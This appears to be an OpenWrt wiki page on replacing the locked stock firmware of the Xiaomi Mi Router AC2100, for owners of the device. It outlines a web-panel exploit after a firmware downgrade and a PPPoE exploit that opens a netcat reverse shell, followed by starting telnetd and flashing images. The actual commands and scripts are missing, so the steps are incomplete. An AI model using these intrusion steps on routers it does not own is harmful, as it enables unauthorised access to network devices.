Xiaomi Mi Router AC2100

The Xiaomi Mi Router AC2100 is a wireless router with MT7621 platform. While it can be acquired for relatively low cost compared to other units with similar specifications, it has two diffrent installation process in order to bypass a locked down stock firmware to install OpenWrt. One of them works in every version of firmwares, other one needs downgrade firmware.

From a technical standpoint, the spec of Xiaomi Mi Router AC2100 is highly identical to Redmi AC2100. It runs Xiaomi Router firmware by default and similarly, it requires a simple “PPPOE” or “Web Panel Shelling” exploit to start a shell and flash OpenWrt via command line interface.

Xiaomi Mi Router AC2100

To install OpenWrt, you first need to get ssh access, then install OpenWrt from ssh.

There are 2 methods for gaining ssh access:

  1. older firmware web exploit (recommended simpler method)
  2. pppoe exploit script using a complicated python script

You first need to downgrade firmware to http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r2100/miwifi_r2100_firmware_4b519_2.0.722.bin

then follow this guide: taken from AX3600 Forum, they have same exploit.

Login in to your router management panel and get the STOK variable like in following example:

When you got SSH access, download OpenWrt firmware files with this URLs. Remember this firmware don't have https connection support. You may need to download it first to pc and transfer it to the router with the local http server.

You need to change the interface to match the name of the interface connected to the Xiaomi router. Also, change the (beginning of) MAC address on the line if src.startswith(“88:c3:97”) to match your router. The full MAC address of the router is on a sticker attached to the router.

Instructions

These instructions assume that the ethernet interface being used is named eth0, please adjust the interface name to your own setup as required within the python scripts. Some of these commands may require to be run as root.

Initial setup
  1. Setup your ethernet interface with the ip address: 192.168.31.177
  2. Bridge the WAN port on the router with one of the LAN ports on the router by connecting an ethernet cable between them.
  3. Connect your computer to the router with your other ethernet cable.

Now we can run our router through the initial setup wizard on http://192.168.31.1, during which PPPoE should be auto-detected and chosen. Any combination of credentials are acceptable.

Running the exploit

In your terminal with netcat open you should see an incoming connection from the router, and we can begin typing in commands to be run on the router.

It is recommended to quickly wget the busybox binary over and start telnetd as the reverse shell is somewhat unstable and disconnect randomly.

If you are disconnected prematurely, just start the netcat listener and exploit script again.

After you have secured telnet access to the device you can wget the OpenWrt images onto the device and flash them.

This device accepts stock signed firmware images from Xiaomi, in the form of PXE boot.

It can be triggered by holding down the reset button on the device while powering on, until the status light flashes amber.
